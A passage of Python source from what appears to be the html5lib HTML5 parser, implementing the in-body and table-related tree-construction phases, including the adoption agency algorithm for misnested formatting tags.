# want to drop leading newlines
data = token["data"]
self.processSpaceCharacters = self.processSpaceCharactersNonPre
if (data.startswith("\n") and
self.tree.openElements[-1].name in ("pre", "listing", "textarea") and
not self.tree.openElements[-1].hasContent()):
data = data[1:]
if data:
self.tree.reconstructActiveFormattingElements()
self.tree.insertText(data)
def processCharacters(self, token):
if token["data"] == "\u0000":
# The tokenizer should always emit null on its own
return
self.tree.reconstructActiveFormattingElements()
self.tree.insertText(token["data"])
# This must be bad for performance
if (self.parser.framesetOK and
any([char not in spaceCharacters
for char in token["data"]])):
self.parser.framesetOK = False
def processSpaceCharactersNonPre(self, token):
self.tree.reconstructActiveFormattingElements()
self.tree.insertText(token["data"])
def startTagProcessInHead(self, token):
return self.parser.phases["inHead"].processStartTag(token)
def startTagBody(self, token):
self.parser.parseError("unexpected-start-tag", {"name": "body"})
if (len(self.tree.openElements) == 1 or
self.tree.openElements[1].name != "body"):
assert self.parser.innerHTML
else:
self.parser.framesetOK = False
for attr, value in token["data"].items():
if attr not in self.tree.openElements[1].attributes:
self.tree.openElements[1].attributes[attr] = value
def startTagFrameset(self, token):
self.parser.parseError("unexpected-start-tag", {"name": "frameset"})
if (len(self.tree.openElements) == 1 or self.tree.openElements[1].name != "body"):
assert self.parser.innerHTML
elif not self.parser.framesetOK:
pass
else:
if self.tree.openElements[1].parent:
self.tree.openElements[1].parent.removeChild(self.tree.openElements[1])
while self.tree.openElements[-1].name != "html":
self.tree.openElements.pop()
self.tree.insertElement(token)
self.parser.phase = self.parser.phases["inFrameset"]
def startTagCloseP(self, token):
if self.tree.elementInScope("p", variant="button"):
self.endTagP(impliedTagToken("p"))
self.tree.insertElement(token)
def startTagPreListing(self, token):
if self.tree.elementInScope("p", variant="button"):
self.endTagP(impliedTagToken("p"))
self.tree.insertElement(token)
self.parser.framesetOK = False
self.processSpaceCharacters = self.processSpaceCharactersDropNewline
def startTagForm(self, token):
if self.tree.formPointer:
self.parser.parseError("unexpected-start-tag", {"name": "form"})
else:
if self.tree.elementInScope("p", variant="button"):
self.endTagP(impliedTagToken("p"))
self.tree.insertElement(token)
self.tree.formPointer = self.tree.openElements[-1]
def startTagListItem(self, token):
self.parser.framesetOK = False
stopNamesMap = {"li": ["li"],
"dt": ["dt", "dd"],
"dd": ["dt", "dd"]}
stopNames = stopNamesMap[token["name"]]
for node in reversed(self.tree.openElements):
if node.name in stopNames:
self.parser.phase.processEndTag(
impliedTagToken(node.name, "EndTag"))
break
if (node.nameTuple in specialElements and
node.name not in ("address", "div", "p")):
break
if self.tree.elementInScope("p", variant="button"):
self.parser.phase.processEndTag(
impliedTagToken("p", "EndTag"))
self.tree.insertElement(token)
def startTagPlaintext(self, token):
if self.tree.elementInScope("p", variant="button"):
self.endTagP(impliedTagToken("p"))
self.tree.insertElement(token)
self.parser.tokenizer.state = self.parser.tokenizer.plaintextState
def startTagHeading(self, token):
if self.tree.elementInScope("p", variant="button"):
self.endTagP(impliedTagToken("p"))
if self.tree.openElements[-1].name in headingElements:
self.parser.parseError("unexpected-start-tag", {"name": token["name"]})
self.tree.openElements.pop()
self.tree.insertElement(token)
def startTagA(self, token):
afeAElement = self.tree.elementInActiveFormattingElements("a")
if afeAElement:
self.parser.parseError("unexpected-start-tag-implies-end-tag",
{"startName": "a", "endName": "a"})
self.endTagFormatting(impliedTagToken("a"))
if afeAElement in self.tree.openElements:
self.tree.openElements.remove(afeAElement)
if afeAElement in self.tree.activeFormattingElements:
self.tree.activeFormattingElements.remove(afeAElement)
self.tree.reconstructActiveFormattingElements()
self.addFormattingElement(token)
def startTagFormatting(self, token):
self.tree.reconstructActiveFormattingElements()
self.addFormattingElement(token)
def startTagNobr(self, token):
self.tree.reconstructActiveFormattingElements()
if self.tree.elementInScope("nobr"):
self.parser.parseError("unexpected-start-tag-implies-end-tag",
{"startName": "nobr", "endName": "nobr"})
self.processEndTag(impliedTagToken("nobr"))
# XXX Need tests that trigger the following
self.tree.reconstructActiveFormattingElements()
self.addFormattingElement(token)
def startTagButton(self, token):
if self.tree.elementInScope("button"):
self.parser.parseError("unexpected-start-tag-implies-end-tag",
{"startName": "button", "endName": "button"})
self.processEndTag(impliedTagToken("button"))
return token
else:
self.tree.reconstructActiveFormattingElements()
self.tree.insertElement(token)
self.parser.framesetOK = False
def startTagAppletMarqueeObject(self, token):
self.tree.reconstructActiveFormattingElements()
self.tree.insertElement(token)
self.tree.activeFormattingElements.append(Marker)
self.parser.framesetOK = False
def startTagXmp(self, token):
if self.tree.elementInScope("p", variant="button"):
self.endTagP(impliedTagToken("p"))
self.tree.reconstructActiveFormattingElements()
self.parser.framesetOK = False
self.parser.parseRCDataRawtext(token, "RAWTEXT")
def startTagTable(self, token):
if self.parser.compatMode != "quirks":
if self.tree.elementInScope("p", variant="button"):
self.processEndTag(impliedTagToken("p"))
self.tree.insertElement(token)
self.parser.framesetOK = False
self.parser.phase = self.parser.phases["inTable"]
def startTagVoidFormatting(self, token):
self.tree.reconstructActiveFormattingElements()
self.tree.insertElement(token)
self.tree.openElements.pop()
token["selfClosingAcknowledged"] = True
self.parser.framesetOK = False
def startTagInput(self, token):
framesetOK = self.parser.framesetOK
self.startTagVoidFormatting(token)
if ("type" in token["data"] and
token["data"]["type"].translate(asciiUpper2Lower) == "hidden"):
# input type=hidden doesn't change framesetOK
self.parser.framesetOK = framesetOK
def startTagParamSource(self, token):
self.tree.insertElement(token)
self.tree.openElements.pop()
token["selfClosingAcknowledged"] = True
def startTagHr(self, token):
if self.tree.elementInScope("p", variant="button"):
self.endTagP(impliedTagToken("p"))
self.tree.insertElement(token)
self.tree.openElements.pop()
token["selfClosingAcknowledged"] = True
self.parser.framesetOK = False
def startTagImage(self, token):
# No really...
self.parser.parseError("unexpected-start-tag-treated-as",
{"originalName": "image", "newName": "img"})
self.processStartTag(impliedTagToken("img", "StartTag",
attributes=token["data"],
selfClosing=token["selfClosing"]))
def startTagIsIndex(self, token):
self.parser.parseError("deprecated-tag", {"name": "isindex"})
if self.tree.formPointer:
return
form_attrs = {}
if "action" in token["data"]:
form_attrs["action"] = token["data"]["action"]
self.processStartTag(impliedTagToken("form", "StartTag",
attributes=form_attrs))
self.processStartTag(impliedTagToken("hr", "StartTag"))
self.processStartTag(impliedTagToken("label", "StartTag"))
# XXX Localization ...
if "prompt" in token["data"]:
prompt = token["data"]["prompt"]
else:
prompt = "This is a searchable index. Enter search keywords: "
self.processCharacters(
{"type": tokenTypes["Characters"], "data": prompt})
attributes = token["data"].copy()
if "action" in attributes:
del attributes["action"]
if "prompt" in attributes:
del attributes["prompt"]
attributes["name"] = "isindex"
self.processStartTag(impliedTagToken("input", "StartTag",
attributes=attributes,
selfClosing=token["selfClosing"]))
self.processEndTag(impliedTagToken("label"))
self.processStartTag(impliedTagToken("hr", "StartTag"))
self.processEndTag(impliedTagToken("form"))
def startTagTextarea(self, token):
self.tree.insertElement(token)
self.parser.tokenizer.state = self.parser.tokenizer.rcdataState
self.processSpaceCharacters = self.processSpaceCharactersDropNewline
self.parser.framesetOK = False
def startTagIFrame(self, token):
self.parser.framesetOK = False
self.startTagRawtext(token)
def startTagNoscript(self, token):
if self.parser.scripting:
self.startTagRawtext(token)
else:
self.startTagOther(token)
def startTagRawtext(self, token):
"""iframe, noembed noframes, noscript(if scripting enabled)"""
self.parser.parseRCDataRawtext(token, "RAWTEXT")
def startTagOpt(self, token):
if self.tree.openElements[-1].name == "option":
self.parser.phase.processEndTag(impliedTagToken("option"))
self.tree.reconstructActiveFormattingElements()
self.parser.tree.insertElement(token)
def startTagSelect(self, token):
self.tree.reconstructActiveFormattingElements()
self.tree.insertElement(token)
self.parser.framesetOK = False
if self.parser.phase in (self.parser.phases["inTable"],
self.parser.phases["inCaption"],
self.parser.phases["inColumnGroup"],
self.parser.phases["inTableBody"],
self.parser.phases["inRow"],
self.parser.phases["inCell"]):
self.parser.phase = self.parser.phases["inSelectInTable"]
else:
self.parser.phase = self.parser.phases["inSelect"]
def startTagRpRt(self, token):
if self.tree.elementInScope("ruby"):
self.tree.generateImpliedEndTags()
if self.tree.openElements[-1].name != "ruby":
self.parser.parseError()
self.tree.insertElement(token)
def startTagMath(self, token):
self.tree.reconstructActiveFormattingElements()
self.parser.adjustMathMLAttributes(token)
self.parser.adjustForeignAttributes(token)
token["namespace"] = namespaces["mathml"]
self.tree.insertElement(token)
# Need to get the parse error right for the case where the token
# has a namespace not equal to the xmlns attribute
if token["selfClosing"]:
self.tree.openElements.pop()
token["selfClosingAcknowledged"] = True
def startTagSvg(self, token):
self.tree.reconstructActiveFormattingElements()
self.parser.adjustSVGAttributes(token)
self.parser.adjustForeignAttributes(token)
token["namespace"] = namespaces["svg"]
self.tree.insertElement(token)
# Need to get the parse error right for the case where the token
# has a namespace not equal to the xmlns attribute
if token["selfClosing"]:
self.tree.openElements.pop()
token["selfClosingAcknowledged"] = True
def startTagMisplaced(self, token):
""" Elements that should be children of other elements that have a
different insertion mode; here they are ignored
"caption", "col", "colgroup", "frame", "frameset", "head",
"option", "optgroup", "tbody", "td", "tfoot", "th", "thead",
"tr", "noscript"
"""
self.parser.parseError("unexpected-start-tag-ignored", {"name": token["name"]})
def startTagOther(self, token):
self.tree.reconstructActiveFormattingElements()
self.tree.insertElement(token)
def endTagP(self, token):
if not self.tree.elementInScope("p", variant="button"):
self.startTagCloseP(impliedTagToken("p", "StartTag"))
self.parser.parseError("unexpected-end-tag", {"name": "p"})
self.endTagP(impliedTagToken("p", "EndTag"))
else:
self.tree.generateImpliedEndTags("p")
if self.tree.openElements[-1].name != "p":
self.parser.parseError("unexpected-end-tag", {"name": "p"})
node = self.tree.openElements.pop()
while node.name != "p":
node = self.tree.openElements.pop()
def endTagBody(self, token):
if not self.tree.elementInScope("body"):
self.parser.parseError()
return
elif self.tree.openElements[-1].name != "body":
for node in self.tree.openElements[2:]:
if node.name not in frozenset(("dd", "dt", "li", "optgroup",
"option", "p", "rp", "rt",
"tbody", "td", "tfoot",
"th", "thead", "tr", "body",
"html")):
# Not sure this is the correct name for the parse error
self.parser.parseError(
"expected-one-end-tag-but-got-another",
{"gotName": "body", "expectedName": node.name})
break
self.parser.phase = self.parser.phases["afterBody"]
def endTagHtml(self, token):
# We repeat the test for the body end tag token being ignored here
if self.tree.elementInScope("body"):
self.endTagBody(impliedTagToken("body"))
return token
def endTagBlock(self, token):
# Put us back in the right whitespace handling mode
if token["name"] == "pre":
self.processSpaceCharacters = self.processSpaceCharactersNonPre
inScope = self.tree.elementInScope(token["name"])
if inScope:
self.tree.generateImpliedEndTags()
if self.tree.openElements[-1].name != token["name"]:
self.parser.parseError("end-tag-too-early", {"name": token["name"]})
if inScope:
node = self.tree.openElements.pop()
while node.name != token["name"]:
node = self.tree.openElements.pop()
def endTagForm(self, token):
node = self.tree.formPointer
self.tree.formPointer = None
if node is None or not self.tree.elementInScope(node):
self.parser.parseError("unexpected-end-tag",
{"name": "form"})
else:
self.tree.generateImpliedEndTags()
if self.tree.openElements[-1] != node:
self.parser.parseError("end-tag-too-early-ignored",
{"name": "form"})
self.tree.openElements.remove(node)
def endTagListItem(self, token):
if token["name"] == "li":
variant = "list"
else:
variant = None
if not self.tree.elementInScope(token["name"], variant=variant):
self.parser.parseError("unexpected-end-tag", {"name": token["name"]})
else:
self.tree.generateImpliedEndTags(exclude=token["name"])
if self.tree.openElements[-1].name != token["name"]:
self.parser.parseError(
"end-tag-too-early",
{"name": token["name"]})
node = self.tree.openElements.pop()
while node.name != token["name"]:
node = self.tree.openElements.pop()
def endTagHeading(self, token):
for item in headingElements:
if self.tree.elementInScope(item):
self.tree.generateImpliedEndTags()
break
if self.tree.openElements[-1].name != token["name"]:
self.parser.parseError("end-tag-too-early", {"name": token["name"]})
for item in headingElements:
if self.tree.elementInScope(item):
item = self.tree.openElements.pop()
while item.name not in headingElements:
item = self.tree.openElements.pop()
break
def endTagFormatting(self, token):
"""The much-feared adoption agency algorithm"""
# http://svn.whatwg.org/webapps/complete.html#adoptionAgency revision 7867
# XXX Better parseError messages appreciated.
# Step 1
outerLoopCounter = 0
# Step 2
while outerLoopCounter < 8:
# Step 3
outerLoopCounter += 1
# Step 4:
# Let the formatting element be the last element in
# the list of active formatting elements that:
# - is between the end of the list and the last scope
# marker in the list, if any, or the start of the list
# otherwise, and
# - has the same tag name as the token.
formattingElement = self.tree.elementInActiveFormattingElements(
token["name"])
if (not formattingElement or
(formattingElement in self.tree.openElements and
not self.tree.elementInScope(formattingElement.name))):
# If there is no such node, then abort these steps
# and instead act as described in the "any other
# end tag" entry below.
self.endTagOther(token)
return
# Otherwise, if there is such a node, but that node is
# not in the stack of open elements, then this is a
# parse error; remove the element from the list, and
# abort these steps.
elif formattingElement not in self.tree.openElements:
self.parser.parseError("adoption-agency-1.2", {"name": token["name"]})
self.tree.activeFormattingElements.remove(formattingElement)
return
# Otherwise, if there is such a node, and that node is
# also in the stack of open elements, but the element
# is not in scope, then this is a parse error; ignore
# the token, and abort these steps.
elif not self.tree.elementInScope(formattingElement.name):
self.parser.parseError("adoption-agency-4.4", {"name": token["name"]})
return
# Otherwise, there is a formatting element and that
# element is in the stack and is in scope. If the
# element is not the current node, this is a parse
# error. In any case, proceed with the algorithm as
# written in the following steps.
else:
if formattingElement != self.tree.openElements[-1]:
self.parser.parseError("adoption-agency-1.3", {"name": token["name"]})
# Step 5:
# Let the furthest block be the topmost node in the
# stack of open elements that is lower in the stack
# than the formatting element, and is an element in
# the special category. There might not be one.
afeIndex = self.tree.openElements.index(formattingElement)
furthestBlock = None
for element in self.tree.openElements[afeIndex:]:
if element.nameTuple in specialElements:
furthestBlock = element
break
# Step 6:
# If there is no furthest block, then the UA must
# first pop all the nodes from the bottom of the stack
# of open elements, from the current node up to and
# including the formatting element, then remove the
# formatting element from the list of active
# formatting elements, and finally abort these steps.
if furthestBlock is None:
element = self.tree.openElements.pop()
while element != formattingElement:
element = self.tree.openElements.pop()
self.tree.activeFormattingElements.remove(element)
return
# Step 7
commonAncestor = self.tree.openElements[afeIndex - 1]
# Step 8:
# The bookmark is supposed to help us identify where to reinsert
# nodes in step 15. We have to ensure that we reinsert nodes after
# the node before the active formatting element. Note the bookmark
# can move in step 9.7
bookmark = self.tree.activeFormattingElements.index(formattingElement)
# Step 9
lastNode = node = furthestBlock
innerLoopCounter = 0
index = self.tree.openElements.index(node)
while innerLoopCounter < 3:
innerLoopCounter += 1
# Node is element before node in open elements
index -= 1
node = self.tree.openElements[index]
if node not in self.tree.activeFormattingElements:
self.tree.openElements.remove(node)
continue
# Step 9.6
if node == formattingElement:
break
# Step 9.7
if lastNode == furthestBlock:
bookmark = self.tree.activeFormattingElements.index(node) + 1
# Step 9.8
clone = node.cloneNode()
# Replace node with clone
self.tree.activeFormattingElements[
self.tree.activeFormattingElements.index(node)] = clone
self.tree.openElements[
self.tree.openElements.index(node)] = clone
node = clone
# Step 9.9
# Remove lastNode from its parents, if any
if lastNode.parent:
lastNode.parent.removeChild(lastNode)
node.appendChild(lastNode)
# Step 9.10
lastNode = node
# Step 10
# Foster parent lastNode if commonAncestor is a
# table, tbody, tfoot, thead, or tr we need to foster
# parent the lastNode
if lastNode.parent:
lastNode.parent.removeChild(lastNode)
if commonAncestor.name in frozenset(("table", "tbody", "tfoot", "thead", "tr")):
parent, insertBefore = self.tree.getTableMisnestedNodePosition()
parent.insertBefore(lastNode, insertBefore)
else:
commonAncestor.appendChild(lastNode)
# Step 11
clone = formattingElement.cloneNode()
# Step 12
furthestBlock.reparentChildren(clone)
# Step 13
furthestBlock.appendChild(clone)
# Step 14
self.tree.activeFormattingElements.remove(formattingElement)
self.tree.activeFormattingElements.insert(bookmark, clone)
# Step 15
self.tree.openElements.remove(formattingElement)
self.tree.openElements.insert(
self.tree.openElements.index(furthestBlock) + 1, clone)
def endTagAppletMarqueeObject(self, token):
if self.tree.elementInScope(token["name"]):
self.tree.generateImpliedEndTags()
if self.tree.openElements[-1].name != token["name"]:
self.parser.parseError("end-tag-too-early", {"name": token["name"]})
if self.tree.elementInScope(token["name"]):
element = self.tree.openElements.pop()
while element.name != token["name"]:
element = self.tree.openElements.pop()
self.tree.clearActiveFormattingElements()
def endTagBr(self, token):
self.parser.parseError("unexpected-end-tag-treated-as",
{"originalName": "br", "newName": "br element"})
self.tree.reconstructActiveFormattingElements()
self.tree.insertElement(impliedTagToken("br", "StartTag"))
self.tree.openElements.pop()
def endTagOther(self, token):
for node in self.tree.openElements[::-1]:
if node.name == token["name"]:
self.tree.generateImpliedEndTags(exclude=token["name"])
if self.tree.openElements[-1].name != token["name"]:
self.parser.parseError("unexpected-end-tag", {"name": token["name"]})
while self.tree.openElements.pop() != node:
pass
break
else:
if node.nameTuple in specialElements:
self.parser.parseError("unexpected-end-tag", {"name": token["name"]})
break
class TextPhase(Phase):
def __init__(self, parser, tree):
Phase.__init__(self, parser, tree)
self.startTagHandler = _utils.MethodDispatcher([])
self.startTagHandler.default = self.startTagOther
self.endTagHandler = _utils.MethodDispatcher([
("script", self.endTagScript)])
self.endTagHandler.default = self.endTagOther
def processCharacters(self, token):
self.tree.insertText(token["data"])
def processEOF(self):
self.parser.parseError("expected-named-closing-tag-but-got-eof",
{"name": self.tree.openElements[-1].name})
self.tree.openElements.pop()
self.parser.phase = self.parser.originalPhase
return True
def startTagOther(self, token):
assert False, "Tried to process start tag %s in RCDATA/RAWTEXT mode" % token['name']
def endTagScript(self, token):
node = self.tree.openElements.pop()
assert node.name == "script"
self.parser.phase = self.parser.originalPhase
# The rest of this method is all stuff that only happens if
# document.write works
def endTagOther(self, token):
self.tree.openElements.pop()
self.parser.phase = self.parser.originalPhase
class InTablePhase(Phase):
# http://www.whatwg.org/specs/web-apps/current-work/#in-table
def __init__(self, parser, tree):
Phase.__init__(self, parser, tree)
self.startTagHandler = _utils.MethodDispatcher([
("html", self.startTagHtml),
("caption", self.startTagCaption),
("colgroup", self.startTagColgroup),
("col", self.startTagCol),
(("tbody", "tfoot", "thead"), self.startTagRowGroup),
(("td", "th", "tr"), self.startTagImplyTbody),
("table", self.startTagTable),
(("style", "script"), self.startTagStyleScript),
("input", self.startTagInput),
("form", self.startTagForm)
])
self.startTagHandler.default = self.startTagOther
self.endTagHandler = _utils.MethodDispatcher([
("table", self.endTagTable),
(("body", "caption", "col", "colgroup", "html", "tbody", "td",
"tfoot", "th", "thead", "tr"), self.endTagIgnore)
])
self.endTagHandler.default = self.endTagOther
# helper methods
def clearStackToTableContext(self):
# "clear the stack back to a table context"
while self.tree.openElements[-1].name not in ("table", "html"):
# self.parser.parseError("unexpected-implied-end-tag-in-table",
# {"name": self.tree.openElements[-1].name})
self.tree.openElements.pop()
# When the current node is <html> it's an innerHTML case
# processing methods
def processEOF(self):
if self.tree.openElements[-1].name != "html":
self.parser.parseError("eof-in-table")
else:
assert self.parser.innerHTML
# Stop parsing
def processSpaceCharacters(self, token):
originalPhase = self.parser.phase
self.parser.phase = self.parser.phases["inTableText"]
self.parser.phase.originalPhase = originalPhase
self.parser.phase.processSpaceCharacters(token)
def processCharacters(self, token):
originalPhase = self.parser.phase
self.parser.phase = self.parser.phases["inTableText"]
self.parser.phase.originalPhase = originalPhase
self.parser.phase.processCharacters(token)
def insertText(self, token):
# If we get here there must be at least one non-whitespace character
# Do the table magic!
self.tree.insertFromTable = True
self.parser.phases["inBody"].processCharacters(token)
self.tree.insertFromTable = False
def startTagCaption(self, token):
self.clearStackToTableContext()
self.tree.activeFormattingElements.append(Marker)
self.tree.insertElement(token)
self.parser.phase = self.parser.phases["inCaption"]
def startTagColgroup(self, token):
self.clearStackToTableContext()
self.tree.insertElement(token)
self.parser.phase = self.parser.phases["inColumnGroup"]
def startTagCol(self, token):
self.startTagColgroup(impliedTagToken("colgroup", "StartTag"))
return token
def startTagRowGroup(self, token):
self.clearStackToTableContext()
self.tree.insertElement(token)
self.parser.phase = self.parser.phases["inTableBody"]
def startTagImplyTbody(self, token):
self.startTagRowGroup(impliedTagToken("tbody", "StartTag"))
return token
def startTagTable(self, token):
self.parser.parseError("unexpected-start-tag-implies-end-tag",
{"startName": "table", "endName": "table"})
self.parser.phase.processEndTag(impliedTagToken("table"))
if not self.parser.innerHTML:
return token
def startTagStyleScript(self, token):
return self.parser.phases["inHead"].processStartTag(token)
def startTagInput(self, token):
if ("type" in token["data"] and
token["data"]["type"].translate(asciiUpper2Lower) == "hidden"):
self.parser.parseError("unexpected-hidden-input-in-table")
self.tree.insertElement(token)
# XXX associate with form
self.tree.openElements.pop()
else:
self.startTagOther(token)
def startTagForm(self, token):
self.parser.parseError("unexpected-form-in-table")
if self.tree.formPointer is None:
self.tree.insertElement(token)
self.tree.formPointer = self.tree.openElements[-1]
self.tree.openElements.pop()
def startTagOther(self, token):
self.parser.parseError("unexpected-start-tag-implies-table-voodoo", {"name": token["name"]})
# Do the table magic!
self.tree.insertFromTable = True
self.parser.phases["inBody"].processStartTag(token)
self.tree.insertFromTable = False
def endTagTable(self, token):
if self.tree.elementInScope("table", variant="table"):
self.tree.generateImpliedEndTags()
if self.tree.openElements[-1].name != "table":
self.parser.parseError("end-tag-too-early-named",
{"gotName": "table",
"expectedName": self.tree.openElements[-1].name})
while self.tree.openElements[-1].name != "table":
self.tree.openElements.pop()
self.tree.openElements.pop()
self.parser.resetInsertionMode()
else:
# innerHTML case
assert self.parser.innerHTML
self.parser.parseError()
def endTagIgnore(self, token):
self.parser.parseError("unexpected-end-tag", {"name": token["name"]})
def endTagOther(self, token):
self.parser.parseError("unexpected-end-tag-implies-table-voodoo", {"name": token["name"]})
# Do the table magic!
self.tree.insertFromTable = True
self.parser.phases["inBody"].processEndTag(token)
self.tree.insertFromTable = False
class InTableTextPhase(Phase):
def __init__(self, parser, tree):
Phase.__init__(self, parser, tree)
self.originalPhase = None
self.characterTokens = []
def flushCharacters(self):
data = "".join([item["data"] for item in self.characterTokens])
if any([item not in spaceCharacters for item in data]):
token = {"type": tokenTypes["Characters"], "data": data}
self.parser.phases["inTable"].insertText(token)
elif data:
self.tree.insertText(data)
self.characterTokens = []
def processComment(self, token):
self.flushCharacters()
self.parser.phase = self.originalPhase
return token
def processEOF(self):
self.flushCharacters()
self.parser.phase = self.originalPhase
return True
def processCharacters(self, token):
if token["data"] == "\u0000":
return
self.characterTokens.append(token)
def processSpaceCharacters(self, token):
# pretty sure we should never reach here
self.characterTokens.append(token)
# assert False
def processStartTag(self, token):
self.flushCharacters()
self.parser.phase = self.originalPhase
return token
def processEndTag(self, token):
self.flushCharacters()
self.parser.phase = self.originalPhase
return token
class InCaptionPhase(Phase):
# http://www.whatwg.org/specs/web-apps/current-work/#in-caption
def __init__(self, parser, tree):
Phase.__init__(self, parser, tree)
self.startTagHandler = _utils.MethodDispatcher([
("html", self.startTagHtml),
(("caption", "col", "colgroup", "tbody", "td", "tfoot", "th",
"thead", "tr"), self.startTagTableElement)
])
self.startTagHandler.default = self.startTagOther
self.endTagHandler = _utils.MethodDispatcher([
("caption", self.endTagCaption),
("table", self.endTagTable),
(("body", "col", "colgroup", "html", "tbody", "td", "tfoot", "th",
"thead", "tr"), self.endTagIgnore)
])
self.endTagHandler.default = self.endTagOther
def ignoreEndTagCaption(self):
return not self.tree.elementInScope("caption", variant="table")
def processEOF(self):
self.parser.phases["inBody"].processEOF()
def processCharacters(self, token):
return self.parser.phases["inBody"].processCharacters(token)
def startTagTableElement(self, token):
self.parser.parseError()
# XXX Have to duplicate logic here to find out if the tag is ignored
ignoreEndTag = self.ignoreEndTagCaption()
self.parser.phase.processEndTag(impliedTagToken("caption"))
if not ignoreEndTag:
return token
def startTagOther(self, token):
return self.parser.phases["inBody"].processStartTag(token)
def endTagCaption(self, token):
if not self.ignoreEndTagCaption():
# AT this code is quite similar to endTagTable in "InTable"
self.tree.generateImpliedEndTags()
if self.tree.openElements[-1].name != "caption":
self.parser.parseError("expected-one-end-tag-but-got-another",
{"gotName": "caption",
"expectedName": self.tree.openElements[-1].name})
while self.tree.openElements[-1].name != "caption":
self.tree.openElements.pop()
self.tree.openElements.pop()
self.tree.clearActiveFormattingElements()
self.parser.phase = self.parser.phases["inTable"]
else:
# innerHTML case
assert self.parser.innerHTML
self.parser.parseError()
def endTagTable(self, token):
self.parser.parseError()
ignoreEndTag = self.ignoreEndTagCaption()
self.parser.phase.processEndTag(impliedTagToken("caption"))
if not ignoreEndTag:
return token
def endTagIgnore(self, token):
self.parser.parseError("unexpected-end-tag", {"name": token["name"]})
def endTagOther(self, token):
return self.parser.phases["inBody"].processEndTag(token)
class InColumnGroupPhase(Phase):
# http://www.whatwg.org/specs/web-apps/current-work/#in-column
def __init__(self, parser, tree):
Phase.__init__(self, parser, tree)
self.startTagHandler = _utils.MethodDispatcher([
("html", self.startTagHtml),
("col", self.startTagCol)
])
self.startTagHandler.default = self.startTagOther
self.endTagHandler = _utils.MethodDispatcher([
("colgroup", self.endTagColgroup),
("col", self.endTagCol)
])
self.endTagHandler.default = self.endTagOther
def ignoreEndTagColgroup(self):
return self.tree.openElements[-1].name == "html"
def processEOF(self):
if self.tree.openElements[-1].name == "html":
assert self.parser.innerHTML
return
else:
ignoreEndTag = self.ignoreEndTagColgroup()
self.endTagColgroup(impliedTagToken("colgroup"))
if not ignoreEndTag:
return True
def processCharacters(self, token):
ignoreEndTag = self.ignoreEndTagColgroup()
self.endTagColgroup(impliedTagToken("colgroup"))
if not ignoreEndTag:
return token
def startTagCol(self, token):
self.tree.insertElement(token)
self.tree.openElements.pop()
token["selfClosingAcknowledged"] = True
def startTagOther(self, token):
ignoreEndTag = self.ignoreEndTagColgroup()
self.endTagColgroup(impliedTagToken("colgroup"))
if not ignoreEndTag:
return token
def endTagColgroup(self, token):
if self.ignoreEndTagColgroup():
# innerHTML case
assert self.parser.innerHTML
self.parser.parseError()
else:
self.tree.openElements.pop()
self.parser.phase = self.parser.phases["inTable"]
def endTagCol(self, token):
self.parser.parseError("no-end-tag", {"name": "col"})
def endTagOther(self, token):
ignoreEndTag = self.ignoreEndTagColgroup()
self.endTagColgroup(impliedTagToken("colgroup"))
if not ignoreEndTag:
return token
class InTableBodyPhase(Phase):
# http://www.whatwg.org/specs/web-apps/current-work/#in-table0
def __init__(self, parser, tree):
Phase.__init__(self, parser, tree)
self.startTagHandler = _utils.MethodDispatcher([
("html", self.startTagHtml),
("tr", self.startTagTr),
(("td", "th"), self.startTagTableCell),
(("caption", "col", "colgroup", "tbody", "tfoot", "thead"),
self.startTagTableOther)
])
self.startTagHandler.default = self.startTagOther
self.endTagHandler = _utils.MethodDispatcher([
(("tbody", "tfoot", "thead"), self.endTagTableRowGroup),
("table", self.endTagTable),
(("body", "caption", "col", "colgroup", "html", "td", "th",
"tr"), self.endTagIgnore)
])
self.endTagHandler.default = self.endTagOther
# helper methods
def clearStackToTableBodyContext(self):
while self.tree.openElements[-1].name not in ("tbody", "tfoot",
"thead", "html"):
# self.parser.parseError("unexpected-implied-end-tag-in-table",
# {"name": self.tree.openElements[-1].name})
self.tree.openElements.pop()
if self.tree.openElements[-1].name == "html":
assert self.parser.innerHTML
# the rest
def processEOF(self):
self.parser.phases["inTable"].processEOF()
def processSpaceCharacters(self, token):
return self.parser.phases["inTable"].processSpaceCharacters(token)
def processCharacters(self, token):
return self.parser.phases["inTable"].processCharacters(token)
def startTagTr(self, token):
self.clearStackToTableBodyContext()
self.tree.insertElement(token)
self.parser.phase = self.parser.phases["inRow"]
def startTagTableCell(self, token):
self.parser.parseError("unexpected-cell-in-table-body",
{"name": token["name"]})
self.startTagTr(impliedTagToken("tr", "StartTag"))
return token
def startTagTableOther(self, token):
# XXX AT Any ideas on how to share this with endTagTable?
if (self.tree.elementInScope("tbody", variant="table") or
self.tree.elementInScope("thead", variant="table") or
self.tree.elementInScope("tfoot", variant="table")):
self.clearStackToTableBodyContext()
self.endTagTableRowGroup(
impliedTagToken(self.tree.openElements[-1].name))
return token
else:
# innerHTML case
assert self.parser.innerHTML
self.parser.parseError()
def startTagOther(self, token):
return self.parser.phases["inTable"].processStartTag(token)
def endTagTableRowGroup(self, token):
if self.tree.elementInScope(token["name"], variant="table"):
self.clearStackToTableBodyContext()
self.tree.openElements.pop()
self.parser.phase = self.parser.phases["inTable"]
else:
self.parser.parseError("unexpected-end-tag-in-table-body",
{"name": token["name"]})
def endTagTable(self, token):
if (self.tree.elementInScope("tbody", variant="table") or
self.tree.elementInScope("thead", variant="table") or
self.tree.elementInScope("tfoot", variant="table")):
self.clearStackToTableBodyContext()
self.endTagTableRowGroup(
impliedTagToken(self.tree.openElements[-1].name))
return token
else:
# innerHTML case
assert self.parser.innerHTML
self.parser.parseError()
def endTagIgnore(self, token):
self.parser.parseError("unexpected-end-tag-in-table-body",
{"name": token["name"]})
def endTagOther(self, token):
return self.parser.phases["inTable"].processEndTag(token)
class InRowPhase(Phase):
# http://www.whatwg.org/specs/web-apps/current-work/#in-row
def __init__(self, parser, tree):
Phase.__init__(self, parser, tree)
self.startTagHandler = _utils.MethodDispatcher([
("html", self.startTagHtml),
(("td", "th"), self.startTagTableCell),
(("caption", "col", "colgroup", "tbody", "tfoot", "thead",
"tr"), self.startTagTableOther)
])
self.startTagHandler.default = self.startTagOther
self.endTagHandler = _utils.MethodDispatcher([
("tr", self.endTagTr),
("table", self.endTagTable),
(("tbody", "tfoot", "thead"), self.endTagTableRowGroup),
(("body", "caption", "col", "colgroup", "html", "td", "th"),
self.endTagIgnore)
])
self.endTagHandler.default = self.endTagOther
# helper methods (XXX unify this with other table helper methods)
def clearStackToTableRowContext(self):
while self.tree.openElements[-1].name not in ("tr", "html"):
self.parser.parseError("unexpected-implied-end-tag-in-table-row",
{"name": self.tree.openElements[-1].name})
self.tree.openElements.pop()
def ignoreEndTagTr(self):
